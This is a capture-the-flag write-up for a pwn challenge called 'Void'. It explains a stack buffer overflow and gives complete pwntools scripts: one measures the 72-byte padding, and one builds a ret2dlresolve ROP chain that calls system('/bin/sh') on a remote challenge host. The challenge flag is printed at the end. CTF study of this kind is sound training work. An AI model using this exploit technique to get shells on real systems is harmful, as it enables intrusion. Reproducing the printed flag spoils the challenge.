# Pwn - Void

## Description

The room goes dark and all you can see is a damaged terminal. Hack into it to restore the power and find your way out.

## Downloads

{% file src="<https://4077916634-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F9J6tnLQGbY0Or10P4xUT%2Fuploads%2F8mYihELGOKoyzMc3LGA1%2Fpwn_void.zip?alt=media&token=4201c6e9-6d3a-420f-b105-150d040487a5>" %}

## Solution

<div align="left"><figure><img src="https://4077916634-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F9J6tnLQGbY0Or10P4xUT%2Fuploads%2FUUjdH3lCO7O6zkqc2zN1%2Fimage.png?alt=media&#x26;token=3d41c4c1-deaa-45d4-996d-096a44b5699a" alt=""><figcaption><p><code>checksec</code> output</p></figcaption></figure></div>

The binary is very simple with a `vuln()` function that has a clear stack buffer overflow.

![](https://4077916634-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F9J6tnLQGbY0Or10P4xUT%2Fuploads%2FPycUfkNa0FrMs0kMCZWO%2Fimage.png?alt=media\&token=44a5d617-3b9a-4c79-9c9e-90dfb60b5dcb)

Looking at the GOT, there is only `read` available.

<div align="left"><figure><img src="https://4077916634-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F9J6tnLQGbY0Or10P4xUT%2Fuploads%2FRbqzX7trKhr9287r1RML%2Fimage.png?alt=media&#x26;token=ecd0d586-ca5e-47ef-8284-2eaf1cca995f" alt=""><figcaption><p>GOT</p></figcaption></figure></div>

1. With no win function anywhere
2. No method like `puts` to leak a libc address
3. Relatively big space to hold a payload (`read(0, buf, 200)`)

It suggest that we'll need to do a Ret2dlresolve ROP chain.

Firstly, the code to find the padding needed to control `rip`.

{% code lineNumbers="true" %}

```python
from pwn import *

binary = context.binary = ELF("./void")

p = process(binary.path)
p.sendline(cyclic(1024, n=8))
p.wait()
core = p.corefile
p.close
os.remove(core.file.name)
padding = cyclic_find(core.read(core.rsp, 8), n=8)
log.info('Padding: ' + str(padding) + " (" + hex(padding) + ")")
```

{% endcode %}

We find the padding needed to be 72 bytes. We then, proceed with creating the dlresolve ROP chain using `pwntools`. While the concept is not so straight-forward, the exploit is very easily written with `pwntools`. The entire exploit code is as simple as such:

{% code lineNumbers="true" %}

```python
from pwn import *

binary = context.binary = ELF("./void")

rop = ROP(binary)

# create the dlresolve object
dlresolve = Ret2dlresolvePayload(binary, symbol='system', args=['/bin/sh'])

rop.raw('A' * 72)
rop.read(0, dlresolve.data_addr) # read to where we want to write the fake structures
rop.ret2dlresolve(dlresolve)     # call .plt and dl-resolve() with the correct, calculated reloc_offset

# send payload
p = remote("178.62.64.13", 30663)

p.sendline(rop.chain())
p.sendline(dlresolve.payload)    # now the read is called and we pass all the relevant structures in

p.interactive()
```

{% endcode %}

Flag: `HTB{r3s0lv3_th3_d4rkn355}`